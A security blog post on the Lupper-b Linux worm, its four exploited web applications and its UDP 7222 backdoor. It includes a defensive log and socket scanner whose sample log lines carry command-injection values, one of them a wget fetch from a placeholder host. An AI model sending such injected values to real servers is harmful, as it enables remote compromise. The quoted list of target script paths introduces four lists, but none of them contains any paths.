Linux “Lupper-b” Worm
Recently there have been a number of remotely exploitable vulnerabilities for Linux that have been widely used by remote attackers. I see a lot of vulnerability probes on machines directly connected to the Internet; the most common probes are for the Awstats and XML-RPC vulnerabilities.
This week I noticed a variation of these probes that indicated something new was afoot. After a bit of googling the actual wget request used during the probe, I discovered there is a new version of the “Lupper” Linux worm on the loose. “Lupper-b”, as it is called, uses a quartet of remotely exploitable vulnerabilities to install itself on host systems.
The four vulnerabilities are found in the Awstats, XML-RPC, Webhints and Includer applications. The worm itself carries a proxy server and a backdoor shell on UDP port 7222; I have also seen mention of an IRC bot included in some cases.
Interestingly enough, while googling the attack string looking for information I actually googled up a vulnerable server or two (or 50, who’s counting?). All in all it’s a fairly slick worm, in that it combines several exploits with a UDP backdoor shell.
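The two indicators the post gives a defender something to look for are the command-laden probes against awstats.pl (the wget request in the query string) and the backdoor listening on UDP port 7222. The check below is an added example, not code from the post or from the Computer Associates writeup: it scans Apache-style access log lines for requests to a watched script whose query string carries wget or shell metacharacters, and scans `ss -lnu` output for a UDP socket bound on port 7222. The log lines and socket listing are constructed samples, the watched-script list holds only the name the post gives (awstats.pl) and is meant to be extended from the writeup, and the exact injection parameters used by the worm are deliberately not modelled.

```python
import re
from urllib.parse import unquote

# Scripts the post names as targets. Only awstats.pl appears in the post;
# extend this tuple with the other script names from the CA writeup.
WATCHED_SCRIPTS = ("awstats.pl",)

# The probes carry a wget request; a wget/curl token or shell metacharacters
# inside a query string aimed at a CGI script is the signal worth alerting on.
SUSPICIOUS_RE = re.compile(r"(wget|curl)\s|[;|`]", re.IGNORECASE)

BACKDOOR_UDP_PORT = 7222  # UDP backdoor shell port given in the post

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access log (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2005:12:01:13 +0000] "GET /cgi-bin/awstats.pl?config=x;wget%20http://192.0.2.10/l HTTP/1.0" 200 512 "-" "-"
198.51.100.2 - - [10/Nov/2005:12:02:44 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Nov/2005:12:03:01 +0000] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 200 9000 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Nov/2005:12:04:20 +0000] "GET /awstats/awstats.pl?config=x%7Cid HTTP/1.0" 404 210 "-" "-"
"""


def suspicious_requests(log_text):
    """Return one dict per request that targets a watched script and whose
    URL-decoded query string contains a wget/curl token or shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in CLF; skip rather than guess
        # Decode %xx escapes so an encoded pipe or semicolon is not missed.
        target = unquote(m.group("target"))
        path, _, query = target.partition("?")
        if not any(path == s or path.endswith("/" + s) for s in WATCHED_SCRIPTS):
            continue
        if SUSPICIOUS_RE.search(query):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": path,
                "status": int(m.group("status")),
            })
    return hits


# Line shape of `ss -lnu` output: State Recv-Q Send-Q Local:Port Peer:Port
SS_RE = re.compile(r"^UNCONN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s")

# Constructed sample of `ss -lnu` output showing one socket bound on 7222.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0      0      0.0.0.0:7222       0.0.0.0:*
UNCONN 0      0      127.0.0.1:323      0.0.0.0:*
"""


def udp_listeners(ss_text, port=BACKDOOR_UDP_PORT):
    """Return the local addresses bound on the given UDP port in `ss -lnu` output."""
    found = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if m and int(m.group("port")) == port:
            found.append(m.group("addr"))
    return found


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("probe:", hit)
    for addr in udp_listeners(SAMPLE_SS):
        print(f"UDP {BACKDOOR_UDP_PORT} bound on {addr}")
```

On a live host the log scanner would read the web server's access log and the socket check would take the output of `ss -lnu` (or `netstat -lnu` on older systems); a hit from the second check on a machine that never intentionally serves UDP 7222 is the stronger indicator, since the probe itself lands on every exposed server whether or not it is vulnerable.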
The paths to vulnerable applications are as follows:
“Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
Trying to exploit the Webhints vulnerability, the worm attempts to submit its commands to the following scripts:
Trying to exploit the Includer vulnerability, the worm attempts to submit its commands to the following scripts:”
A full writeup on the worm is available from Computer Associates; be sure to follow the links on the specific vulnerabilities so you get the full gist of the attack vector.